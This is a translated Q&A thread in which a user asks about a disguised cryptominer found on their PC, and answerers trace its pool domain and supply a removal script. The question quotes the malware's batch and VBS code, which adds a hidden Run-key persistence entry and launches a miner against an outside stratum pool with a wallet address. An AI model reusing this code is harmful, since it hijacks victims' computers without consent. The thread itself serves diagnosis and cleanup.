batch-file - 解释木马bat文件

Question

一天早上我的系统真的很慢。任务管理器显示 Internet 下载管理器正在运行，即使我从未安装它。我在“用户/（我的帐户）/appdata/roaming/adobe/flashplayer/purecache”中找到了它的位置。它占用了相当多的CPU。

网上搜索表明它可能是某种正在运行的恶意软件脚本。每次我早上通过注册表中的条目启动时，它都会自行启动。我不知道我在我的系统上安装了多久。

启动它的 bat 文件是：

@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x

与 bat 文件位于同一文件夹中的 vbs 脚本文件为：

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

我已经从我的系统中删除了所有条目，但我担心可能发生了什么，因为我不知道这在我的系统上已经存在了多久。

我知道这是某种木马。但是有人可以为我解释一下 bat 和脚本文件，以及这些文件发送到 ns1.eaglecould.su 的信息。

谢谢

Answer 1

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Users\David Candy>nslookup -type=all ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
ns1.eaglecloud.su       internet address = 95.47.160.203

(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

eaglecloud.su
        primary name server = fred.ns.cloudflare.com
        responsible mail addr = dns.cloudflare.com
        serial  = 2015717786
        refresh = 10000 (2 hours 46 mins 40 secs)
        retry   = 2400 (40 mins)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx cloudflare.com
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
cloudflare.com  MX preference = 30, mail exchanger = alt2.aspmx.l.google.com
cloudflare.com  MX preference = 40, mail exchanger = aspmx2.googlemail.com
cloudflare.com  MX preference = 50, mail exchanger = aspmx3.googlemail.com
cloudflare.com  MX preference = 10, mail exchanger = aspmx.l.google.com
cloudflare.com  MX preference = 20, mail exchanger = alt1.aspmx.l.google.com

aspmx2.googlemail.com   internet address = 74.125.193.26
aspmx3.googlemail.com   internet address = 74.125.196.26
aspmx.l.google.com      internet address = 74.125.25.26
alt1.aspmx.l.google.com internet address = 74.125.193.27
alt2.aspmx.l.google.com internet address = 74.125.196.27
(root)  ??? unknown type 41 ???

我会向 Cloudflare 和 Google 投诉，因为他们正在使用他们的基础设施。

Answer 2

很抱歉唤醒了一个古老的话题，但我遇到了同样的问题。不过我有一个解决方案。幸好不是木马。

此恶意软件模拟 Adob​​e 更新程序实用程序。然而，Adobe 总是对他们的制作程序进行数字签名。这是一个比特币矿工。我通过查找它用于与互联网通信的层 + tcp协议发现了这一点。这返回了一页关于比特币矿工的结果。

批处理文件的实际作用是在注册表中创建一个新条目，以便矿工在您登录时自动启动。该矿工使用您的 CPU 能力来挖掘比特币（一种在线货币）的哈希值，类似于您的国家打印纸币的方式。据我所知，它不涉及任何个人文件。

删除注册表项和相关文件为我杀死了它。下面是一个批处理脚本，它可以为您完成所有这些工作。

@echo off
echo Starting removal. Please make sure that you've closed IDMan.exe
pause
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeFlashPlayer /f
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe"
del "%appdata%\Adobe\Flash Player\PureCache\libcurl.dll"
del "%appdata%\Adobe\Flash Player\PureCache\pthreadGC2.dll"
del "%appdata%\Adobe\Flash Player\PureCache\zlib1.dll"
echo Removal complete.
pause

将其粘贴到批处理文件中，您应该一切顺利。